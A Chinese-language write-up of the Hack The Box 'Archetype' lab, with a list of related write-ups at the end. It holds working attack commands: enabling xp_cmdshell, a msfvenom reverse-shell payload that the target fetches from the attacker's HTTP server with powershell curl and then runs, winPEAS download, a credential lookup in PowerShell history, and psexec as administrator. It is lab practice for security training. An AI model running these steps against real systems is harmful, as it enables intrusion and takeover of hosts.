文章目录

所用工具
一、信息收集
二、寻找falg
- 1.使用mssqlclient.py连接到mssql
- 2.拿shell
- 3.提权

所用工具

nmap
mssqlclient.py
psexec.py
metasploit
winPEAS.bat
工具下载链接在文中

一、信息收集

使用nmap对目标靶机进行扫描
nmap -A -T4 -v 10.129.171.38
发现目标主机开启了smb、sql server服务

尝试连接目标SMB服务
Linux可使用smbclient进行连接
仅发现一个backups文件夹

发现敏感信息(mssql的账号密码)
ID:ARCHETYPE\sql_svc
Password:M3g4c0rp123

二、寻找falg

1.使用mssqlclient.py连接到mssql

下载impacket工具包:
mssqlclient.py在examples目录下

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install -r requirements.txt
python3 setup.py install

使用下面命令连接目标数据库

python3 mssqlclient.py sql_svc@[IP] -windows-auth

使用xp_cmdshell工具执行系统命令

xp_cmdshell "whoami"

报错了，查看官方文档，使用以下命令，开启xp_cmdshell

SQL> EXECUTE sp_configure 'show advanced options', 1;
SQL> RECONFIGURE;
SQL> EXECUTE sp_configure 'xp_cmdshell', 1;
SQL> RECONFIGURE;

执行完后再次尝试，实现命令执行

2.拿shell

实现命令执行后拿shell的方式很多，我这里使用msf进行连接：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=【本机IP】 LPORT=【监听端口】 -e 【编码方式/可以不选择】 -i 【编码次数】 -f exe > shell.exe

生成shell

在当前目录开启www服务

使用powershell中的curl将shell下载到目标主机

xp_cmdshell "powershell curl http://10.10.14.42:8000/shell.exe -O c:\users\public\shell.exe"

在msf中设置监听

执行shell.exe ，建立连接

xp_cmdshell "c:\users\public\shell.exe"

当前用户为普通权限账户，寻找第一个flag（靶机一共有两个flag，第二个flag在特权用户目录下）
第一个flag在当前用户的桌面目录下，寻找过程省略-----

3.提权

使用winPEAS工具对目标主机进行信息收集，寻找提权点
winPEAS下载地址

https://github.com/carlospolop/PEASS-ng/

进入winPEAS目录开启http.server，将winPEAS下载到目标主机

powershell wget -uri http://10.10.14.42:8000/winPEAS.bat -outfile c:\users\public\winPEAS.bat

执行winPEAS.bat，寻找目标主机敏感信息

c:\users\public\winPEAS.bat

这个工具还能检查到目标主机未安装哪些补丁，可以根据这些补丁查找对应的提权工具

程序执行完后会输出一些目录信息

检查第一个历史文件，发现administrator账户密码

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

现在，我们需要一个工具在目标PC上以管理员身份登录

psexec 是 windows下非常好的一款远程命令行工具。psexec的使用不需要对方主机开机3389端口，只需要对方开启admin$共享(该共享默认开启)。但是，假如目标主机开启了防火墙，psexec也是不能使用的，会提示找不到网络路径。由于psexec是windows提供的工具，所以杀毒软件会将其添加到白名单中。
http://cn-sec.com/archives/129212.html

psexec.py工具在前面下载的impacket工具包里，
使用psexec.py工具连接目标主机

python3 psexec.py administrator@10.129.171.3

这个工具建立的连接会间接性卡顿，为了避免连接断开，使用当前特权用户重新执行shell.exe文件，使msf接收到特权用户的反弹shell
重新开启一个msf监听

使用特权用户执行shell.exe

c:\users\public\shell.exe

提权结束

第二个flag地址在administrator的桌面目录下

HTB TIER 2 Archetype wp相关推荐

Hack The Box - TIER 2 - Archetype Oopsie Vaccine Unified
这个阶段的,终于不是之前的傻乎乎操作了,到这我才知道,那些问答不是先问答再渗透的.原来是渗透一步回答相应问题,这里涉及到了许多工具.脚本.提权.端口等知识点,收获丰富. Archetype TASK ...
HackTheBox - Brainfuck Write Up
OS:Linux DIFFICULTY:Insane 0x01 信息收集端口扫描 + 指纹识别 naabu -host 10.10.10.17 -Pn -tp full -nmap-cli 'nma ...
htb snoopy wp记录
这个破靶机难度不高但是也不低-考的东西蛮多,卡在主页太久了,收集完信息后一直太多时间浪费在fuzz首页的download接口,感谢hxd发现afr有路径过滤,要不这靶机彻底卡这了. 惯例nmap扫一下 ...
Htb socket wp
Htb socket wp过程思路 (复盘的时候发现下面这段思路有问题,只是恰巧瞎猫碰上死耗子了,websocket注入时候还是得两种引号轮换着来,一定要多尝试,不过感觉这段的思路可能会在其他场景用上 ...
htb Sandworm wp
nmap 有域名 ssa.htb加到hosts 看web 爆dns和域名点到contact里面有个guide可以点点进去之后web如下从上往下依次是: 测试解密密文测试公钥加密生成密文 ...
HTB Meow靶机wp
TASK 1 首字母缩略词 VM 代表什么? VM的缩写一般是指虚拟机的意思所以答案是Virtual Machine TASK 2 我们使用什么工具与操作系统交互以启动我们的 VPN 连接? 我们在k ...
[Hack The Box] HTB—Paper walkthrough
[Hack The Box] HTB-Paper walkthrough HTB-Paper [Hack The Box] HTB-Paper walkthrough 一.信息搜集 X-Backend ...
使用Maven命令行快速创建项目骨架（archetype）
> mvn archetype:generate 接下来就会输出一些列带索引变化的archetype项可供我们选择,然后提示我们选择一个编号,可以直接回车选择默认的编号(392),然后就跟着一步 ...
Maven3 Archetype ArtifactId大全及简单说明
关键字:Maven3 Archetype ArtifactId大全及简单说明;Archetype大全;项目类型完成日期:2014-02-25 一:[size=large]Maven标准模板[/siz ...
WAMP and WordPress Install on AWS Free Tier Windows 2012 R2
AWS provides a 750 hours free tier on Windows machine. I am always wondering how to install wordpres ...

HTB TIER 2 Archetype wp